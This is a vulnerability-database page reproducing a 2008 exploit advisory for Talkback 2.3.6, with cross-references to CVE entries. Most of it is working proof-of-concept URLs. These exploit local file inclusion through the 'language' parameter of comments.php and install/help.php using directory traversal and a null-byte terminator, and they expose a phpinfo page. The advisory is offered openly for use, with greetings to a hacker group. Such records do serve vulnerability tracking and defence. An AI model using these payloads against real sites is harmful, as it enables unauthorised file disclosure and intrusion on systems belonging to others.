Lucene search
SirGodEDB-ID:6451HistorySep 13, 2008 - 12:00 a.m.
Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities
2008-09-1300:00:00
SirGod
www.exploit-db.com
27
AI Score
7.4
Confidence
Low
############################################################################################################
[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
############################################################################################################
[+] Local File Inclusion
PoC 1 :
http://[target]/[path]/comments.php?language=[Local File]%00
Example 1 :
http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00
PoC 2 :
http://[target]/[path]/install/help.php?language=[Local File]%00
Example 2 :
http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00
[+] PHPInfo Disclosure
PoC:
http://[target]/[path]/install/info.php
Example :
http://127.0.0.1/talkback/install/info.php
##############################################################################################################
# milw0rm.com [2008-09-13]Related
nvd
nvd
CVE-2008-4115
2008-09-16 23:00:01
CVE-2008-4346
2008-09-30 18:15:08
cvelist
cvelist
CVE-2008-4115
2008-09-16 23:00:00
CVE-2008-4346
2008-09-30 18:00:00
prion
prion
Information disclosure
2008-09-16 23:00:00
Directory traversal
2008-09-30 18:15:00
cve
cve
CVE-2008-4115
2008-09-16 23:00:01
CVE-2008-4346
2008-09-30 18:15:08